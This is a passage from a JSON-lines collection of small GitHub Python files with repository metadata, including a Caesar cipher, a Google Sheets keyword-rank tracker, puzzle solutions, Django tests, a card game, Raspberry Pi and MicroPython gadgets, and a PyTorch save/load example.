(0.5*((-1)**np.abs(m_))*prefac)[:,:,:,np.newaxis] \\\n * (Bpm_/r**2)[np.newaxis,:,:]\n\n# tstamp('Bpm done')\n\n Bmm += Bmm_\n B0m += B0m_\n B00 += B00_\n Bpm += Bpm_\n\n Bmm = Bmm.astype('float64')\n B0m = B0m.astype('float64')\n B00 = B00.astype('float64')\n Bpm = Bpm.astype('float64')\n\n #constructing the other two components of the kernel\n Bpp = parity_fac[:,:,:,np.newaxis]*Bmm\n Bp0 = parity_fac[:,:,:,np.newaxis]*B0m\n \n return Bmm,B0m,B00,Bpm,Bp0,Bpp\n","repo_name":"srijaniiserprinceton/Global_lorentz_stress","sub_path":"get_kernels_separate.py","file_name":"get_kernels_separate.py","file_ext":"py","file_size_in_byte":7374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3075244879","text":"choice = input('Шифр Цезаря\\nЧто вы хотите сделать с текстом? Ш - шифровать Р - расшифровать\\n')\nlang = input('Какой язык текста будет использован? Р - русский А - английский\\n')\ndelta = int(input('Задайте шаг сдвига (целое число)\\n'))\n\nchars_ru = 'абвгдежзийклмнопрстуфхцчшщъыьэюя'\nchars_eng = 'abcdefghijklmnopqrstuvwxyz'\n\n\ndef crypt_n_decrypt(string, delta, lang, choice):\n if lang.lower() == 'р':\n chars, mod = chars_ru, 32\n elif lang.lower() == 'а':\n chars, mod = chars_eng, 26\n\n if choice.lower() == 'р':\n delta = -delta\n\n for i in range(len(string)):\n if string[i] in '1234567890,./: !?':\n continue\n\n if string[i].isupper():\n chartmp = chars.upper()[(chars.find(string[i].lower()) + delta) % mod]\n else:\n chartmp = chars.lower()[(chars.find(string[i].lower()) + delta) % mod]\n\n string = string[:i] + chartmp + string[i + 1:]\n return string\n\n\nprint(crypt_n_decrypt(input('Введите текст\\n'), delta, lang, choice))\n","repo_name":"Bl00dWolf/Stepik_Course","sub_path":"Course for newbies/Caesar_Cipher.py","file_name":"Caesar_Cipher.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"865845748","text":"# Basic system packages:\nimport traceback\nimport os.path\nimport os\nimport shutil\nfrom urllib.parse import urlparse\nimport json\nimport sys\nfrom pprint import pprint\nimport datetime\nfrom pathlib import Path\nimport pathlib\nimport time\n\n# Google APIs\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.oauth2 import service_account\nfrom google.auth.transport.requests import Request\n\n# DataforSEO:\nfrom apiclient import errors\nfrom client import RestClient\n\n# NOTE: If you're looking for a place to start reading, jump to \"call_initiate_ranking\"\n# at the bottom of this file. \n\n# Tells Google oauth what we want permission to touch\nSCOPES = ['https://www.googleapis.com/auth/spreadsheets',\n 'https://www.googleapis.com/auth/drive']\n\nSERVICE_ACCOUNT_FILE = 'service_account.json'\n\n# Target spreadsheet ID\nFOLDER_ID = '1_PCARCXUY2s4ROn1xUn-FiDBULp5ylCW'\nSHEET_TITLE = str(datetime.datetime.now().year)\n\n# Convert column index into A1 notation\ndef colnum_string(n):\n string = \"\"\n while n > 0:\n n, remainder = divmod(n - 1, 26)\n string = chr(65 + remainder) + string\n return string\n\n# Pass credentials from service_account.json to the Google API.\ndef authenticate_google(API_title, API_version):\n creds = service_account.Credentials.from_service_account_file(\n SERVICE_ACCOUNT_FILE, scopes=SCOPES)\n\n return build(API_title, API_version, credentials=creds)\n\n# Pass credentials from dataforseocreds.json to the DataForSEO API.\ndef authenticate_dataforseo():\n creds = None\n with open(\"dataforseocreds.json\", 'r') as f:\n creds = json.load(f)\n \n if creds:\n return RestClient(creds[\"login\"], creds[\"password\"])\n else: \n raise ValueError('No datafroseo credentials.')\n\n\n# Make sure a sheet exists for the current year and\n# copy keywords/URLs to new sheet if not (only runs at begining of each year)\ndef check_year_and_copy(sheet_id, service):\n\n # Get list of sheets in the spreadsheet\n spreadsheet_data = service.spreadsheets().get(spreadsheetId=sheet_id).execute()\n sheets = spreadsheet_data[\"sheets\"]\n\n # the \"next\" function in this condition finds the first element of the array that matches our constraint\n # in this case that the sheet title matches the current year. \n # If no sheet is found, it returns -1 and we create a sheet.\n if next((sheet for sheet in sheets if sheet['properties']['title'] == SHEET_TITLE), -1) == -1:\n\n old_sheet = str(datetime.datetime.now().year - 1)\n old_sheet_id = next((sheet for sheet in sheets if sheet['properties']['title'] == old_sheet), -1)['properties']['sheetId']\n\n # Count rows we must copy\n sheet = service.spreadsheets()\n result = sheet.values().get(spreadsheetId=sheet_id,\n range=(old_sheet + '!A:B')).execute()\n row_count = len(result.get('values', []))\n\n # Create a new sheet\n new_sheet_body = {\n \"requests\": [\n {\n \"addSheet\": {\n \"properties\": {\n \"title\": SHEET_TITLE,\n \"gridProperties\": {\n \"rowCount\": row_count,\n \"columnCount\": 2\n }\n }\n }\n }\n ]\n }\n request = service.spreadsheets().batchUpdate(spreadsheetId=sheet_id, body=new_sheet_body)\n new_sheet_response = request.execute()\n new_sheet_id = new_sheet_response[\"replies\"][0][\"addSheet\"][\"properties\"][\"sheetId\"]\n\n # Copy targets from old sheet to new sheet\n copy_keywords_body = {\n \"requests\": [\n {\n \"copyPaste\": {\n \"source\": {\n \"sheetId\": old_sheet_id,\n \"startRowIndex\": 0,\n \"endRowIndex\": row_count,\n \"startColumnIndex\": 0,\n \"endColumnIndex\": 2\n },\n \"destination\": {\n \"sheetId\": new_sheet_id,\n \"startRowIndex\": 0,\n \"endRowIndex\": row_count,\n \"startColumnIndex\": 0,\n \"endColumnIndex\": 2\n },\n \"pasteType\": \"PASTE_NORMAL\"\n }\n }\n ]\n }\n\n request = service.spreadsheets().batchUpdate(spreadsheetId=sheet_id, body=copy_keywords_body)\n request.execute()\n\n\n# Download keywords from spreadsheet.\ndef load_keyword_targets(sheet_id, service):\n\n # If it's a new year then move to a new sheet\n check_year_and_copy(sheet_id, service)\n \n # Call the Sheets API\n sheet = service.spreadsheets()\n result = sheet.values().get(spreadsheetId=sheet_id,\n range=(SHEET_TITLE + '!A:B')).execute()\n values = result.get('values', [])\n\n if not values:\n raise ValueError('No target data found.')\n else:\n\n # Cut off first element because we don't want column titles\n return values[1:len(values)]\n\n# Submit keywords as jobs to DataForSEO\ndef initiate_tasks(keyword_targets, client):\n post_data = dict()\n for count, target in enumerate(keyword_targets):\n post_data[len(post_data)] = dict(\n language_code=\"en\",\n location_code=2840,\n keyword=target[0]\n )\n # Rate limiting, no more than 100 tasks per post by DataForSEO rules\n if (count % 95 == 0 and count > 0) or count == len(keyword_targets) - 1:\n response = client.post(\"/v3/serp/google/organic/task_post\", post_data)\n if response[\"status_code\"] != 20000:\n print(\"error. Code: %d Message: %s\" % (response[\"status_code\"], response[\"status_message\"]))\n post_data = dict()\n\n# The \"main\" function\ndef initiate_ranking(_):\n\n # Authenticate our APIs\n client = authenticate_dataforseo()\n drive_service = authenticate_google('drive', 'v3')\n sheet_service = authenticate_google('sheets', 'v4')\n\n # List of Keyword/URL pairs to track:\n targets = [] \n\n # Loop through spreadsheets in our folder until there are no more. \n # This while loop is necessary to handle (potentially infintie) pagination from Google Drive\n page_token = None\n while True:\n\n # Request one \"page\" of spreadsheets\n response = drive_service.files().list(q=\"mimeType='application/vnd.google-apps.spreadsheet' and '\" + FOLDER_ID + \"' in parents\",\n spaces='drive',\n fields='nextPageToken, files(id)',\n pageToken=page_token, supportsAllDrives=True, includeItemsFromAllDrives=True).execute()\n # Loop through each spreadsheet in this \"page\"\n for file in response.get('files', []):\n pprint(file.get('id'))\n\n # Add Keyword/URL pairs from this sheet to our list\n targets = targets + load_keyword_targets(file.get('id'), sheet_service)\n\n # Sleep to avoid hitting API rate limiting.\n time.sleep(20)\n\n # Request next \"page\" of spreadsheets \n page_token = response.get('nextPageToken', None)\n if page_token is None:\n break\n \n # Submit keyword/URL pairs to DataforSEO\n initiate_tasks(targets, client)\n\n# This function wraps our script in a try/catch because otherwise GCP won't print errors if it crashes.\ndef call_initiate_ranking(_):\n try:\n initiate_ranking(None)\n except Exception as e:\n track = traceback.format_exc()\n print(track)","repo_name":"obventio56/keywordranktracker","sub_path":"initiate_tracker.py","file_name":"initiate_tracker.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11808246575","text":"import numpy as np\n\nN = int(input())\n\nA = []\nB = []\n\nfor _ in range(N):\n a, b = list(map(int, input().split()))\n A.append(a)\n B.append(b)\n\na_star, b_star = np.argmin(A), np.argmin(B)\n\n\nif a_star == b_star:\n a, b = A[a_star], B[b_star]\n A[a_star] = np.inf\n B[b_star] = np.inf\n\n a_star, b_star = np.argmin(A), np.argmin(B)\n print(min(max(a, B[b_star]), max(A[a_star], b), a + b))\n\nelse:\n print(max(A[a_star], B[b_star]))","repo_name":"Soule50431/AtCoder","sub_path":"ABC/ABC 194/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5370554537","text":"'''\nA nice string is one with all of the following properties:\n\n It contains at least three vowels (aeiou only), like aei, xazegov, or aeiouaeiouaeiou.\n It contains at least one letter that appears twice in a row, like xx, abcdde (dd), or aabbccdd (aa, bb, cc, or dd).\n It does not contain the strings ab, cd, pq, or xy, even if they are part of one of the other requirements.\n'''\n\ndef numvowels(s):\n\tvowels = ['a','e','i','o','u']\n\tcv = 0\n\tfor c in s:\n\t\tif c in vowels: cv += 1\n\treturn cv\n\ndef numdoubles(s):\n\tcv = 0\n\tlast_c = ' '\n\tfor c in s:\n\t\tif c == last_c: cv += 1\n\t\tlast_c = c\n\treturn cv\n\ndef bad(s):\n\tbad_pairs = [\"ab\", \"cd\", \"pq\", \"xy\"]\n\tfor n in range(len(s)-1):\n\t\tif s[n:n+2] in bad_pairs: return True\n\treturn False\n\t\ndef isnice(s):\n\tif (bad(s)): return False;\n\tif numvowels(s) > 2:\n\t\tif numdoubles(s) > 0:\n\t\t\treturn True\n\treturn False\n\ndef dbl_overlap(s):\n\tfor n in range(len(s) - 2):\n\t\tpair = s[n:n+2]\n\t\tfor j in range(n+2, len(s) - 2):\n\t\t\tif pair == s[j:j+2]: return True\n\treturn False\n\ndef rep_letter(s):\n\tfor i in range(len(s) - 3):\n\t\tif s[i] == s[i+2]: return True\n\treturn False\n\ndef isniceP2(s):\n\treturn dbl_overlap(s) and rep_letter(s)\n\t\n\t\nnice = 0\nfor line in open(\"data.txt\", \"r\"):\n\tif isnice(line) : \n\t\tnice += 1\n\nprint(\"Part 1: there are \", nice, \" nice strings\")\n\nnice = 0\nfor line in open(\"data.txt\", \"r\"):\n\tif isniceP2(line) : \n\t\tnice += 1\n\nprint(\"Part 2: there are \", nice, \" nice strings\")\n","repo_name":"buscagliad/adventofcode","sub_path":"2015/day05/nice.py","file_name":"nice.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24053061927","text":"from django.urls import reverse\n\nfrom rest_framework.test import APITestCase\n\nfrom mocks.tests.factories import SubscriptionFactory\nfrom roles.models import Role\nfrom users.tests.factories import UserFactory\n\n\nclass TestMockAPI(APITestCase):\n fixtures = ('roles.yaml',)\n\n @classmethod\n def setUpTestData(cls):\n cls.user = UserFactory()\n cls.url_premium = reverse('api:mocks:mocks-phone')\n cls.url_extra = reverse('api:mocks:mocks-color')\n cls.url_luxe = reverse('api:mocks:mocks-passport')\n\n def test_phone_data_can_be_accessed_only_by_premium(self):\n role = Role.objects.get(name='Premium')\n SubscriptionFactory(user=self.user, role=role)\n self.client.force_authenticate(user=self.user)\n response = self.client.get(self.url_premium)\n self.assertEqual(response.status_code, 200)\n\n def test_color_data_can_be_accessed_only_by_extra(self):\n role = Role.objects.get(name='Extra')\n SubscriptionFactory(user=self.user, role=role)\n self.client.force_authenticate(user=self.user)\n response = self.client.get(self.url_extra)\n self.assertEqual(response.status_code, 200)\n\n def test_passport_data_can_be_accessed_only_by_luxe(self):\n role = Role.objects.get(name='Luxe')\n SubscriptionFactory(user=self.user, role=role)\n self.client.force_authenticate(user=self.user)\n response = self.client.get(self.url_luxe)\n self.assertEqual(response.status_code, 200)\n\n def test_can_not_access_data_with_no_subscription(self):\n self.client.force_authenticate(user=self.user)\n response = self.client.get(self.url_premium)\n self.assertEqual(response.status_code, 403)\n\n self.client.force_authenticate(user=self.user)\n response = self.client.get(self.url_extra)\n self.assertEqual(response.status_code, 403)\n\n self.client.force_authenticate(user=self.user)\n response = self.client.get(self.url_luxe)\n self.assertEqual(response.status_code, 403)\n","repo_name":"lymagics/game-of-roles","sub_path":"src/mocks/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37867435875","text":"import random\n\n# Card constants\nSUIT_TUPLE = ('Spades', 'Hearts', 'Clubs', 'Diamonds')\nRANK_TUPLE = ('Ace', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'Jack', 'Queen', 'King')\n\nNCARDS = 8\n\n# Pass in a deck and this function returns a random card from the deck\ndef getCard(deckListIn):\n thisCard = deckListIn.pop()\n return thisCard\n\n# Pass in a deck and this function returns a shuffled copy of the deck\ndef shuffle(deckListIn):\n deckListOut = deckListIn.copy() # Deep Copy: Different from deckListIn[:]\n random.shuffle(deckListOut)\n return deckListOut\n\n# Main code\nprint(f'Welcome to Higher or Lower \\n'\n f'You have to choose whether the next card to be shown will be higher or lower than the current card \\n'\n f'Getting it right adds 20 points; get it wrong and you \\n'\n f'lose 15 points. \\n'\n f'You have 50 points to start. \\n'\n f'\\n')\n\n# Create a list of Dictionary\nstartingDeckList = []\n\nfor suit in SUIT_TUPLE:\n for thisValue, rank in enumerate(RANK_TUPLE):\n cardDict = {'rank': rank, 'value': thisValue+1, 'suit': suit}\n startingDeckList.append(cardDict)\n\n\nscore = 50\nwhile True:\n print()\n gameDeckList = shuffle(startingDeckList)\n currentCardDict = getCard(gameDeckList)\n currentCardRank = currentCardDict['rank']\n currentCardValue = currentCardDict['value']\n currentCardSuit = currentCardDict['suit']\n print('Starting card is:', currentCardRank + ' of ' + currentCardSuit)\n print()\n\n # play 1 game of 8 cards\n\n for cardNumber in range(0, NCARDS): # play one game of this many cards\n answer = input(f'Will the next card be higher or lower than the {currentCardRank} of '\n f'{currentCardSuit}? (enter h or l):')\n answer = answer.casefold()\n\n nextCardDict = getCard(gameDeckList)\n nextCardRank = nextCardDict['rank']\n nextCardSuit = nextCardDict['suit']\n nextCardValue = nextCardDict['value']\n print(f'Next card is: {nextCardRank} of {nextCardSuit}')\n\n if answer == 'h':\n if nextCardValue > currentCardValue:\n print('You got it right, it was higher')\n score = score + 20\n else:\n print('Sorry, it was not higher')\n score = score - 15\n elif answer == 'l':\n if nextCardValue < currentCardValue:\n score = score + 20\n print('You got it right, it was lower')\n else:\n score = score - 15\n print('Sorry, it was not lower')\n\n print('Your score is:', score)\n print()\n currentCardRank = nextCardRank\n currentCardValue = nextCardValue # don't need current suit\n\n goAgain = input('To play again, press ENTER, or \"q\" to quit: ')\n if goAgain == 'q':\n break\n\nexit()\n\n","repo_name":"suvambh/ObjectOrientedPython","sub_path":"Part_1/HigherOrLowerProcedural.py","file_name":"HigherOrLowerProcedural.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73907215274","text":"from setuptools import setup, find_packages\nimport codecs\nimport os\nimport sys\n\nprint(sys.argv)\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith codecs.open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as reader:\n long_description = '\\n'.join(reader.readlines())\n\nVERSION = '0.0.0'\nDESCRIPTION = 'test package for testing github workflow'\nLONG_DESCRIPTION = long_description\n\n# Setting up\n# noinspection SpellCheckingInspection\nsetup(\n version=os.environ.get('BUILD_VERSION') or VERSION,\n name=\"malogan-pypi-test\",\n author=\"malogan (Mason Logan)\",\n author_email=\"\",\n url='https://github.com/masonlogan1/pypi-test',\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n packages=find_packages(exclude=['tests']),\n install_requires=[],\n data_files=[],\n include_package_data=True,\n keywords=[],\n classifiers=[\n \"Development Status :: 2 - Pre-Alpha\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ]\n)\n","repo_name":"masonlogan1/pypi-test","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8694832328","text":"import time\r\nfrom machine import I2C, Pin\r\nfrom vl6180 import Sensor\r\nimport ssd1306\r\n\r\ni2c_lidar = I2C(sda=Pin(4), scl=Pin(5))\r\ni2c_display = I2C(-1, Pin(5), Pin(4))\r\nlidar = Sensor(i2c_lidar)\r\ndisplay = ssd1306.SSD1306_I2C(128, 64, i2c_display)\r\ndisplay.fill(0)\r\nprev = lidar.range()\r\nwhile True:\r\n display.fill(0)\r\n display.text(\"Range-Milli Mts : \", 0, 0)\r\n display.text(str(lidar.range()), 0, 10)\r\n display.text(\"Gesture : \", 0, 20)\r\n cur = lidar.range()\r\n if prev > cur:\r\n if prev is 255:\r\n display.text(\"Glitch\", 21, 40)\r\n else:\r\n display.text(\"Approaching\", 21, 40)\r\n elif prev < cur:\r\n display.text(\"Moving Away\", 21, 40)\r\n elif cur is 255:\r\n display.text(\"No Gesture\", 21, 40)\r\n\r\n prev = cur\r\n display.show()\r\n","repo_name":"miubisystems/IOT-Using-NodeMCU-MicroPython","sub_path":"Lab8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"14391015110","text":"import pygame\nimport board\nimport busio\nimport time\nimport paho.mqtt.client as mqtt\nimport uuid\nimport signal\n\nfrom gtts import gTTS\nfrom word2number import w2n\nimport speech_recognition as sr\nimport os\nimport random\n\nimport digitalio\nfrom PIL import Image, ImageDraw, ImageFont\nimport adafruit_rgb_display.st7789 as st7789\n\n# ======================= record voices =====================================\n\nPauseText = 'Music Paused'\nPlayText = 'Music Continued'\nSkipText = \"Music Skipped\"\n\nlanguage = 'en'\nmPause = gTTS(text=PauseText, lang=language, slow=False)\nmPlay = gTTS(text=PlayText, lang=language, slow=False) \nmSkip = gTTS(text=SkipText, lang=language, slow=False) \n\nmPause.save(\"mpause.mp3\")\nmPlay.save(\"mplay.mp3\")\nmSkip.save(\"mskip.mp3\")\n\n# ======================= Controls ==========================================\n\n# Configuration for CS and DC pins (these are FeatherWing defaults on M0/M4):\ncs_pin = digitalio.DigitalInOut(board.CE0)\ndc_pin = digitalio.DigitalInOut(board.D25)\nreset_pin = None\n\n# Config for display baudrate (default max is 24mhz):\nBAUDRATE = 64000000\n\nbacklight = digitalio.DigitalInOut(board.D22)\nbacklight.switch_to_output()\nbacklight.value = True\nbuttonA = digitalio.DigitalInOut(board.D23)\nbuttonB = digitalio.DigitalInOut(board.D24)\nbuttonA.switch_to_input()\nbuttonB.switch_to_input()\n\n# Setup SPI bus using hardware SPI:\nspi = board.SPI()\n\n# Create the ST7789 display:\ndisp = st7789.ST7789(\n spi,\n cs=cs_pin,\n dc=dc_pin,\n rst=reset_pin,\n baudrate=BAUDRATE,\n width=135,\n height=240,\n x_offset=53,\n y_offset=40,\n)\n\nheight = disp.width # we swap height/width to rotate it to landscape!\nwidth = disp.height\n\nimage = Image.new(\"RGB\", (width, height))\ndraw = ImageDraw.Draw(image)\n\n\n#================================ music player ===============================================\n\npygame.init()\npygame.mixer.init()\n\ndef play(x):\n pygame.mixer.music.load(x)\n pygame.mixer.music.play()\ndef stop():\n pygame.mixer.music.stop()\ndef pause():\n pygame.mixer.music.pause()\ndef unpause():\n pygame.mixer.music.unpause()\n \nsong = \"test.mp3\"\nsong2 = \"test2.mp3\"\ncurr = \"test.mp3\"\nplay(curr)\n\nisPause = False\n\n#Set up speech recognition\nr = sr.Recognizer()\n \nwhile True:\n string = song\n \n font = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 18)\n \n draw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))\n \n if not buttonA.value:\n pause()\n with sr.Microphone() as source:\n audio = r.listen(source)\n response = r.recognize_sphinx(audio)\n #responseInt = w2n.word_to_num(response)\n print(\"DEBUG:\" + response)\n if response == \"stop\":\n os.system(\"mplayer mpause.mp3\")\n isPause = True\n continue\n elif response == \"play\":\n os.system(\"mplayer mplay.mp3\")\n isPause = False\n unpause()\n continue\n elif response == \"banana\":\n os.system(\"mplayer mskip.mp3\")\n isPause = False\n if curr == \"test.mp3\":\n curr = \"test2.mp3\"\n play(\"test2.mp3\")\n else:\n curr = \"test.mp3\"\n play(\"test.mp3\") \n if isPause == False:\n unpause()\n \n '''\n if not buttonA.value:\n pause()\n if not buttonB.value:\n unpause() \n '''\n draw.text((0, 0), string, font=font, fill=(240,255,255))\n \n disp.image(image, 90)\n time.sleep(.01)\n","repo_name":"hguoTTT/Interactive-Lab-Hub","sub_path":"finalproject/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"6250203368","text":"import torch\nimport torch.nn.functional as func\nfrom torch import nn\n\n\n# 加载和保存张量\nx = torch.arange(4) # 长为 4 的向量\ntorch.save(x, 'x-file') # 将向量 x 存储在这个叫做 x-file 的文件里\nx2 = torch.load(\"x-file\") # 访问并读取 x-file 的文件,加载到 x2 中\n\n# 列表和字典同样可以存储和读取\ny = torch.arange(4)\ntorch.save([x, y], 'x-file')\nx2, y2 = torch.load(\"x-file\")\n\nmydict = {'x': x, 'y': y}\ntorch.save(mydict, 'x-file')\nmydict2 = torch.load(\"x-file\")\n\n\n# 加载和保存模型参数\n# 其实只需要存储权重就好了。比如给出一个最简单的 MLP\nclass MLP(nn.Module):\n def __init__(self):\n super().__init__() # 继承父类\n self.hidden = nn.Linear(20, 256)\n self.out = nn.Linear(256, 20)\n\n # nn.Module 类中,__call__ 方法会调用 forward 方法。这里重写 nn.Module 模块\n def forward(self, x): # x 是输入\n # 先根据输入,求出隐藏层的输出;然后通过 ReLU 激活函数,最后通过 self.out 输出,这就完成了前向计算\n return self.out(func.relu(self.hidden(x)))\n\n\nnet = MLP()\nX = torch.randn(size=(2, 20))\nY = net(X)\n\n\n# 现在就可以将模型的参数存储在一个叫做 mlp.params 的文件\ntorch.save(net.state_dict(), 'mlp.params')\n\n# 如果要读取,则先需要实例化 MLP\nclone = MLP()\nclone.load_state_dict(torch.load(\"mlp.params\")) # 用文件中的参数覆盖掉初始化参数\n","repo_name":"Sen-Yao/MyDeepLearning","sub_path":"1. Linear regression model/MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72015214312","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 23 19:12:01 2020\n\n@author: pi\n\"\"\"\n\nimport paho.mqtt.client as mqtt\n\n# This is the Publisher\n\nclient = mqtt.Client()\nclient.connect(\"192.168.43.2\",1883,60)\nclient.publish(\"sensor/data\", \"Hello world!\");\nclient.disconnect();","repo_name":"falconeroberto/image_rasp","sub_path":"broker_center_component/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39972836919","text":"from functools import wraps\nfrom tornado import web, gen\nfrom tornado.web import HTTPError\nfrom ecogame.handler.common_handler import AuthCommonHandler\n\n\ndef require_cords(method):\n \"\"\"\n Allow AJAX requests only\n\n Usage:\n @require_ajax\n def my_view(request):\n pass\n \"\"\"\n\n @wraps(method)\n def wrapper(handler, *args, **kwargs):\n try:\n lat = float(handler.get_argument('lat'))\n lng = float(handler.get_argument('lng'))\n except ValueError:\n raise HTTPError(400)\n kwargs['lat'] = round(lat, 6)\n kwargs['lng'] = round(lng, 6)\n return method(handler, *args, **kwargs)\n return wrapper\n\n\nclass GameDashboardHandler(AuthCommonHandler):\n @web.authenticated\n def get(self):\n self.render('game.html')\n\n\nclass ZombiesHandler(AuthCommonHandler):\n @web.authenticated\n @gen.coroutine\n def get(self):\n \"\"\"Возвращает зомби доступных пользователю\"\"\"\n zombies = yield self.user.zombies()\n self.send_json(zombies)\n\n\nclass PollutionHandler(AuthCommonHandler):\n @web.authenticated\n @gen.coroutine\n def get(self):\n \"\"\"Возвращает загрязнения\"\"\"\n pollutions = yield self.loader.pollution_manager.find()\n self.send_json(pollutions)\n\n\nclass RobotHandler(AuthCommonHandler):\n @web.authenticated\n @gen.coroutine\n def get(self):\n \"\"\"Возвращает загрязнения\"\"\"\n robots = yield self.loader.robot_manager.find_visible()\n self.send_json(robots)\n\n\nclass RobotMoveHandler(AuthCommonHandler):\n @web.authenticated\n @gen.coroutine\n @require_cords\n def post(self, robot_id, lat, lng, *args, **kwargs):\n \"\"\"Перемещает робота на указанные координаты\"\"\"\n robot = yield self.user.get_robot(robot_id)\n robot.move(lat, lng)\n self.send_json({'result': True})\n\n\nclass BoomHandler(AuthCommonHandler):\n @web.authenticated\n @gen.coroutine\n @require_cords\n def post(self, lat, lng, *args, **kwargs):\n \"\"\"Удаляет загрязнений в указанных координатах\"\"\"\n if self.user.balance <= 0:\n self.send_error_json('Недостаточно кристалов. Приглашайте друзей и выполняйте задания!', {'balance': 0})\n else:\n removed_ids = yield self.user.boom(lat, lng)\n self.send_json({'balance': self.user.balance, 'items': removed_ids.as_ids_view()})\n","repo_name":"octoberry/eco-py","sub_path":"ecogame/handler/game_handler.py","file_name":"game_handler.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20891704081","text":"import unittest\n\nfrom typing import Dict, List, Any\n\nfrom pybits.subset import (\n dict_assert_is_subset,\n dict_is_subset,\n list_is_subset,\n)\nfrom pybits.exceptions import (\n ComparisonBaseError,\n ComparisonErrorInfo,\n)\n\n\nclass TestSubsetModule(unittest.TestCase):\n def test_dict_assert_is_subset_exception(self):\n with self.assertRaises(ComparisonErrorInfo):\n superset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"type\": \"asdf\",\n \"children\": [{\"name\": \"foo\", \"type\": \"asdf\", \"children\": []}],\n }\n\n subset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"children\": [{\"name\": \"bar\", \"children\": []}],\n }\n\n dict_assert_is_subset(subset, superset)\n\n def test_dict_assert_is_subset_exception_depth(self):\n superset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"type\": \"asdf\",\n \"children\": [{\"name\": \"foo\", \"type\": \"asdf\", \"children\": []}],\n }\n\n subset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"children\": [{\"name\": \"bar\", \"children\": []}],\n }\n\n result = -1\n\n result_excpected = 2\n\n try:\n dict_assert_is_subset(subset, superset)\n except ComparisonBaseError as e:\n result = e.depth\n\n self.assertEqual(result, result_excpected)\n\n def test_dict_is_subset_true(self):\n superset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"type\": \"asdf\",\n \"children\": [{\"name\": \"foo\", \"type\": \"asdf\", \"children\": []}],\n }\n\n subset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"children\": [{\"name\": \"foo\", \"children\": []}],\n }\n\n result = dict_is_subset(subset, superset)\n\n self.assertTrue(result)\n\n def test_dict_is_subset_false(self):\n superset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"type\": \"asdf\",\n \"children\": [{\"name\": \"foo\", \"type\": \"asdf\", \"children\": []}],\n }\n\n subset: Dict[str, Any] = {\n \"name\": \"some_name\",\n \"children\": [{\"name\": \"bar\", \"children\": []}],\n }\n\n result = dict_is_subset(subset, superset)\n\n self.assertFalse(result)\n\n def test_list_is_subset_strings_true(self):\n superset: List[str] = [\"foo\", \"bar\", \"foobar\"]\n\n subset: List[str] = [\"foobar\"]\n\n result = list_is_subset(subset, superset)\n\n self.assertTrue(result)\n\n def test_list_is_subset_strings_false(self):\n superset: List[str] = [\"foo\", \"bar\", \"foobar\"]\n\n subset: List[str] = [\"barfoo\"]\n\n result = list_is_subset(subset, superset)\n\n self.assertFalse(result)\n\n def test_list_is_subset_lists_true(self):\n superset: List[List[str]] = [[\"foo\"], [\"bar\"], [\"foobar\", \"barfoo\"]]\n\n subset: List[List[str]] = [[\"foobar\"]]\n\n result = list_is_subset(subset, superset)\n\n self.assertTrue(result)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"cgbits/pybits","sub_path":"tests/subset_test.py","file_name":"subset_test.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72072892714","text":"import numpy as np\nimport cv2\nimport glob\nimport yaml\n\n# termination criteria\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n\n# prepare object points, like (0,0,0), (1,0,0), (2,0,0) 